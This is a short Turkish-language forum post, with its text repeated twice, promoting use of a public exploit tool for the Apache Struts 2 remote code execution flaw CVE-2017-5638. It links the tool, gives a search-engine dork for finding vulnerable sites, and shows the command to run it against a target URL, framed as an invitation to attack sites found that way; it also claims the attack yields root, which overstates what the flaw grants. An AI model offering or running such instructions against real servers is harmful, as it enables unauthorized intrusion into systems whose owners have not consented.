Selamün Aleyküm Dostlar
Bu gün Sizlere CVE-2017-5638 - Apache Struts 2 "Jakarta Multipart Parser" RCE bahsedeceğim
program mantığı uzaktan erişim ile serverda root yetkisi sağlamaktadır.
Bu herserverda olmuyor ama olan serverda root yetkisi vermektedir.
indirme link :
Kod:
https://github.com/mazen160/struts-pwn
googlede arama dork : action
bulduğumuz siteyi aşağıdaki komutaki gibi çalıştıracağız... İyi Çalışmlar
Kod:
python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'
Bu gün Sizlere CVE-2017-5638 - Apache Struts 2 "Jakarta Multipart Parser" RCE bahsedeceğim
program mantığı uzaktan erişim ile serverda root yetkisi sağlamaktadır.
Bu herserverda olmuyor ama olan serverda root yetkisi vermektedir.
indirme link :
Kod:
https://github.com/mazen160/struts-pwn
googlede arama dork : action
bulduğumuz siteyi aşağıdaki komutaki gibi çalıştıracağız... İyi Çalışmlar
Kod:
python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'